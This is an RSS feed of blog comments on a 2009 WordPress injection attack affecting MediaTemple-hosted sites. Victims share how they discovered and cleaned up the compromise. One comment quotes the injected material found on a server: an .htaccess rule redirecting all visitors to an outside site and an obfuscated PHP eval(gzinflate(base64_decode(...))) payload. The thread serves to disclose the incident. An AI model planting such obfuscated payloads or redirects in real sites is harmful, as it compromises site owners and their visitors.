<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Wordpress, MediaTemple, and an Injection Attack &#91;Expose&#93;Comments on: </title>
	<atom:link href="http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/</link>
	<description>coherent thoughts on diverse topics</description>
	<lastBuildDate>Sun, 21 Mar 2010 03:24:23 -0700</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: Media Temple Grid (gs) Review: F- #doublefail &#124; vps hosting reviews</title>
		<link>http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-4013</link>
		<dc:creator>Media Temple Grid (gs) Review: F- #doublefail &#124; vps hosting reviews</dc:creator>
		<pubDate>Wed, 24 Feb 2010 04:50:20 +0000</pubDate>
		<guid isPermaLink="false">http://www.kyle-brady.com/?p=5117#comment-4013</guid>
		<description>[...] http://www.kyle-brady.com/2009/11/07&#8230;ection-attack/ [...]</description>
		<content:encoded><![CDATA[<p>[...] <a href="http://www.kyle-brady.com/2009/11/07&#8230;ection-attack/" rel="nofollow">http://www.kyle-brady.com/2009/11/07&#8230;ection-attack/</a> [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Image Searchers Snared By Malware &#124; JetLib News</title>
		<link>http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-3994</link>
		<dc:creator>Image Searchers Snared By Malware &#124; JetLib News</dc:creator>
		<pubDate>Thu, 04 Feb 2010 15:38:22 +0000</pubDate>
		<guid isPermaLink="false">http://www.kyle-brady.com/?p=5117#comment-3994</guid>
		<description>[...] to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being [...]</description>
		<content:encoded><![CDATA[<p>[...] to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Kyle Brady</title>
		<link>http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-3927</link>
		<dc:creator>Kyle Brady</dc:creator>
		<pubDate>Mon, 28 Dec 2009 22:47:49 +0000</pubDate>
		<guid isPermaLink="false">http://www.kyle-brady.com/?p=5117#comment-3927</guid>
		<description>Interesting - maybe the (mt) exploit was adapted for another host?&lt;br&gt;&lt;br&gt;I&#039;m not sure what to tell you, other than your results are strikingly similar to mine and many others&#039;.&lt;br&gt;&lt;br&gt;--Kyle</description>
		<content:encoded><![CDATA[<p>Interesting &#8211; maybe the (mt) exploit was adapted for another host?</p>
<p>I&#39;m not sure what to tell you, other than your results are strikingly similar to mine and many others&#39;.</p>
<p>&#8211;Kyle</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Sarah</title>
		<link>http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-3926</link>
		<dc:creator>Sarah</dc:creator>
		<pubDate>Mon, 28 Dec 2009 21:40:20 +0000</pubDate>
		<guid isPermaLink="false">http://www.kyle-brady.com/?p=5117#comment-3926</guid>
		<description>May be worth pointing out I&#039;m not a MT customer, I use a different UK host.</description>
		<content:encoded><![CDATA[<p>May be worth pointing out I&#39;m not a MT customer, I use a different UK host.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Sarah</title>
		<link>http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-3925</link>
		<dc:creator>Sarah</dc:creator>
		<pubDate>Mon, 28 Dec 2009 21:32:09 +0000</pubDate>
		<guid isPermaLink="false">http://www.kyle-brady.com/?p=5117#comment-3925</guid>
		<description>Thanks for the info.  I had this on an old wordpress blog I hadn&#039;t updated since Feb - looks like it only got compromised on the 26th December (today being the 28th), I had comments/trackbacks disabled too.&lt;br&gt;&lt;br&gt;In my case something seemed amiss when I logged in to &quot;Add Post&quot; and the page didn&#039;t format properly.  As the dashboard suggested I was running an old version I did the &quot;recommended&quot; upgrade to 2.9.  The webpage then informed me my database also needed upgrading - when I clicked on this link I got redirected to &lt;a href=&quot;http://thecreativevirus.com&quot; rel=&quot;nofollow&quot;&gt;thecreativevirus.com&lt;/a&gt;.  Apart from the suspicious-sounding name, this website tried to get me to install some software to view a &quot;video&quot; - I had to kill the web browser to get it to leave this page &amp; am currently running a virus scan.&lt;br&gt;&lt;br&gt;Logging on to the webserver, I discovered at the bottom of the .htaccess file:&lt;br&gt;RewriteRule .* &lt;a href=&quot;http://you-search.in/in.cgi?4&amp;parameter=ku&quot; rel=&quot;nofollow&quot;&gt;http://you-search.in/in.cgi?4&amp;parameter=ku&lt;/a&gt; [R,L]&lt;br&gt;&lt;br&gt;and at the bottom of an index.html file:&lt;br&gt;&lt;br&gt;eval(gzinflate(base64_decode(&#039;dVFda8IwFH0X/A+XEpaGldj6AXNSpg9FXybD1b1MKV2b2GBNStpOxth/X+I+3MOEhOTec8/NuSdoXTM92zHZQAh1oxtVqiPTLkoeo9VTtHrGizh+SNYmSmbzaBnjLZl0O4K7prhStYt+G3iAd0rtSoYJKA3f+F/4LS2UuogeankRK8WraUu6nfduBwBpIxbjib0bJYiHU16rbK8qJl0cjEc0GPs0GND+YIS9G99DzCztBT6BVOYw5VXbGOncA2cexdArhdyLpickrYrqLleHVMjQAQqtLpnMVM7OhjhfZ7Kc3UfOlpgi56o1UlMr9RLpHxctEWy6F1B/ozdyoermFg6+ZlRIm7DbsUMDHAtRMhdQaQbnmqX5SXzg94eEWDtoaLCTH1Oelao2T3NyilEV/vyU9pxz2wmwrFBQty8GthiqroeW8vEJ&#039;)));&lt;br&gt;&lt;br&gt;These files in both public_html and (more worryingly) its parent directory contained this dodgy code.  As the blog &amp; indeed the website only had 2 posts I am just doing a completely clean install, having changed all the passwords I can find &amp; deleted the old database.&lt;br&gt;&lt;br&gt;I hadn&#039;t installed ANY plugins, just one theme.</description>
		<content:encoded><![CDATA[<p>Thanks for the info.  I had this on an old wordpress blog I hadn&#39;t updated since Feb &#8211; looks like it only got compromised on the 26th December (today being the 28th), I had comments/trackbacks disabled too.</p>
<p>In my case something seemed amiss when I logged in to &#8220;Add Post&#8221; and the page didn&#39;t format properly.  As the dashboard suggested I was running an old version I did the &#8220;recommended&#8221; upgrade to 2.9.  The webpage then informed me my database also needed upgrading &#8211; when I clicked on this link I got redirected to <a href="http://thecreativevirus.com" rel="nofollow">thecreativevirus.com</a>.  Apart from the suspicious-sounding name, this website tried to get me to install some software to view a &#8220;video&#8221; &#8211; I had to kill the web browser to get it to leave this page &#038; am currently running a virus scan.</p>
<p>Logging on to the webserver, I discovered at the bottom of the .htaccess file:<br />RewriteRule .* <a href="http://you-search.in/in.cgi?4&#038;parameter=ku" rel="nofollow">http://you-search.in/in.cgi?4&#038;parameter=ku</a> [R,L]</p>
<p>and at the bottom of an index.html file:</p>
<p>eval(gzinflate(base64_decode(&#39;dVFda8IwFH0X/A+XEpaGldj6AXNSpg9FXybD1b1MKV2b2GBNStpOxth/X+I+3MOEhOTec8/NuSdoXTM92zHZQAh1oxtVqiPTLkoeo9VTtHrGizh+SNYmSmbzaBnjLZl0O4K7prhStYt+G3iAd0rtSoYJKA3f+F/4LS2UuogeankRK8WraUu6nfduBwBpIxbjib0bJYiHU16rbK8qJl0cjEc0GPs0GND+YIS9G99DzCztBT6BVOYw5VXbGOncA2cexdArhdyLpickrYrqLleHVMjQAQqtLpnMVM7OhjhfZ7Kc3UfOlpgi56o1UlMr9RLpHxctEWy6F1B/ozdyoermFg6+ZlRIm7DbsUMDHAtRMhdQaQbnmqX5SXzg94eEWDtoaLCTH1Oelao2T3NyilEV/vyU9pxz2wmwrFBQty8GthiqroeW8vEJ&#39;)));</p>
<p>These files in both public_html and (more worryingly) its parent directory contained this dodgy code.  As the blog &#038; indeed the website only had 2 posts I am just doing a completely clean install, having changed all the passwords I can find &#038; deleted the old database.</p>
<p>I hadn&#39;t installed ANY plugins, just one theme.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: karl</title>
		<link>http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-3888</link>
		<dc:creator>karl</dc:creator>
		<pubDate>Mon, 30 Nov 2009 15:04:26 +0000</pubDate>
		<guid isPermaLink="false">http://www.kyle-brady.com/?p=5117#comment-3888</guid>
		<description>It seems Mediatemple is working on it. (I got my password changed for me, without being targeted for the attack.)&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://weblog.mediatemple.net/weblog/2009/11/29/1026-our-work-continues/&quot; rel=&quot;nofollow&quot;&gt;http://weblog.mediatemple.net/weblog/2009/11/29...&lt;/a&gt;</description>
		<content:encoded><![CDATA[<p>It seems Mediatemple is working on it. (I got my password changed for me, without being targeted for the attack.)</p>
<p><a href="http://weblog.mediatemple.net/weblog/2009/11/29/1026-our-work-continues/" rel="nofollow"></a><a href="http://weblog.mediatemple.net/weblog/2009/11/29.." rel="nofollow">http://weblog.mediatemple.net/weblog/2009/11/29..</a>.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: MediaTemple index.php Injection Analysis &#8211; bundyxc.com</title>
		<link>http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-3881</link>
		<dc:creator>MediaTemple index.php Injection Analysis &#8211; bundyxc.com</dc:creator>
		<pubDate>Sun, 29 Nov 2009 21:30:22 +0000</pubDate>
		<guid isPermaLink="false">http://www.kyle-brady.com/?p=5117#comment-3881</guid>
		<description>[...] So the first part of the code isn&#8217;t too harmful&#8230; it&#8217;s just a link. But this second part downloads the entire page, and displays it on your website. That is definitely not good. However, if you were affected, don&#8217;t worry&#8230; the fix seems to be relatively simple. [...]</description>
		<content:encoded><![CDATA[<p>[...] So the first part of the code isn&#8217;t too harmful&#8230; it&#8217;s just a link. But this second part downloads the entire page, and displays it on your website. That is definitely not good. However, if you were affected, don&#8217;t worry&#8230; the fix seems to be relatively simple. [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Christian Bundy</title>
		<link>http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-3882</link>
		<dc:creator>Christian Bundy</dc:creator>
		<pubDate>Sun, 29 Nov 2009 18:33:13 +0000</pubDate>
		<guid isPermaLink="false">http://www.kyle-brady.com/?p=5117#comment-3882</guid>
		<description>Just wanted to point out that the eval() code is not javascript, it&#039;s definitely PHP. I&#039;ve taken the code apart, and posted an analysis of the eval() injection at my blog.&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://bundyxc.com/?p=95&quot; rel=&quot;nofollow&quot;&gt;http://bundyxc.com/?p=95&lt;/a&gt;</description>
		<content:encoded><![CDATA[<p>Just wanted to point out that the eval() code is not javascript, it&#39;s definitely PHP. I&#39;ve taken the code apart, and posted an analysis of the eval() injection at my blog.</p>
<p><a href="http://bundyxc.com/?p=95" rel="nofollow">http://bundyxc.com/?p=95</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Media Temple Security Issues</title>
		<link>http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-3869</link>
		<dc:creator>Media Temple Security Issues</dc:creator>
		<pubDate>Fri, 27 Nov 2009 06:18:26 +0000</pubDate>
		<guid isPermaLink="false">http://www.kyle-brady.com/?p=5117#comment-3869</guid>
		<description>[...] from Media Temple. Apparently a number of people have received this email and some have had some fairly serious security exploits with their WordPress installs. If you&#8217;d like to read more into the problem, Kyle Brady has [...]</description>
		<content:encoded><![CDATA[<p>[...] from Media Temple. Apparently a number of people have received this email and some have had some fairly serious security exploits with their WordPress installs. If you&#8217;d like to read more into the problem, Kyle Brady has [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Kyle Rush</title>
		<link>http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-3870</link>
		<dc:creator>Kyle Rush</dc:creator>
		<pubDate>Fri, 27 Nov 2009 03:21:12 +0000</pubDate>
		<guid isPermaLink="false">http://www.kyle-brady.com/?p=5117#comment-3870</guid>
		<description>I received the same email from Media Temple on the 25th, but, so far, haven&#039;t noticed any of the things mentioned in this post. I did however notice that the title and content of just one of my WordPress posts had been altered. More on that here: &lt;a href=&quot;http://kylerush.net/cms/media-temple-security-issues/&quot; rel=&quot;nofollow&quot;&gt;http://kylerush.net/cms/media-temple-security-i...&lt;/a&gt;</description>
		<content:encoded><![CDATA[<p>I received the same email from Media Temple on the 25th, but, so far, haven&#39;t noticed any of the things mentioned in this post. I did however notice that the title and content of just one of my WordPress posts had been altered. More on that here: <a href="http://kylerush.net/cms/media-temple-security-issues/" rel="nofollow"></a><a href="http://kylerush.net/cms/media-temple-security-i.." rel="nofollow">http://kylerush.net/cms/media-temple-security-i..</a>.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
